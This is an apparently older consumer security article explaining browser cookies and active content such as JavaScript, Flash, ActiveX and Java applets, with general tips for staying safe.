As we boldly go into a new era of web design and development, websites are no longer the static pages of yesteryear.
We demand the ability to comment, to customize, to log in, to share with our friends. We demand polished visual elements that dazzle on all devices: drop-down menus, high-resolution splash screens, customizable interfaces and more.
With all these elements come active content; the true driving force of today’s web. Sites today are relying on scripts and web application frameworks, and with this greater power comes greater potential for abuse. (Sorry fans, Spider-Man quote denied.)
So, here’s what you need to know about cookies and active content.
##What Is A Cookie, Anyway?## As you browse the web and log in, information about your computer is collected and stored in small files called ‘cookies’. The content of these files varies, but might include the browser you’re using, the operating system you’re running, your IP address and other details.
More sophisticated cookies might store information about your browsing habits: when you last visited a site, the Google search words that brought you there, and other information to aid in marketing and development.
Cookies are so common that you’ll come across hundreds – even thousands – per day, all collected in the background. These cookies come in two main flavors:
-
Session cookies These cookies hold information about your current visit to a site and help with navigation. Upon closing your browser, these cookies are erased.
-
Persistent cookies These cookies are saved on your computer, allowing your site preferences to be stored. For instance, when you opt for a site to “remember you” and log you in automatically, this is an example of a persistent cookie.
Should an attacker gain access to these files, it can lead to them gaining information about your shopping habits, how much time you spend on particular sites, which bank you hold an account with, and other personal data.
##What’s Active Content?##
Many visual elements such as drop-down menus, splash pages and sliding banners rely on web scripts to operate. Entire sites, like Facebook, are simply giant web applications that run a multitude of scripts all at once.
The main player in active content, JavaScript, is now a major life force of the web and allows for easy creation of great-looking web applications, forms and sites. It’s a ubiquitous and powerful language, providing an amazing amount of functionality and support for web creators.
However, it’s for this reason that it’s so often a target. If not properly secured, attackers can manipulate the JavaScript on a website for any number of purposes: submitting forms to their own e-mail addresses, sending users to malicious sites, stealing cookies and more.
Other forms of active content allow your browser to show you videos within webpages (think YouTube, Vimeo, and other video streaming sites). These videos often make use of a plugin within your browser, such as Adobe Flash Player. However, they’re increasingly moving towards HTML5, which does not require a special plugin.
In particular, Adobe Flash has recently suffered from numerous security flaws and zero days, allowing attackers to execute malicious code on a user’s computer via their Flash browser plugin. While larger streaming sites are shying away, many smaller video hosting sites are still using Flash, which is why it pays to ensure that you’re always running the latest version.
ActiveX and Java applets are another type of content that can be downloaded and run automatically by your browser. Examples of these include viewing PDF or Word documents without the need for downloading the document itself, or using interactive educational simulations written in Java via a web interface.
When written by reputable companies, there’s no risk – but unsigned and 3rd party active content can be used as a powerful way to take control of your computer: downloading malware, keyloggers, stealing data and more.
##Staying Safe## It’s important to remember that Active Content and Cookies are not inherently dangerous. In fact, they’re an essential part of the web. In some sense, it’s almost impossible to avoid them, so being aware of their power is the biggest way to keep your data safe.
While it’s possible to completely disable cookies and active content in your browser, doing so will render many of your favourite sites unusable. Instead, practice caution and set your browser to ask whether you wish to run active content. Regularly cleaning out your cookies can help to rid you of persistent tracker cookies from various ad agencies.
If you’re running Java on your machine, make sure it is up to date; most attacks rely on exploiting obsolete versions of its browser plugin. When visiting a site you’re not familiar with, take the precaution of disabling active content in your browser.
Don’t forget about email, too: your email client can run much of the same active content that your browser does. Where possible, choose to view your messages as plain text to resolve this potential security issue.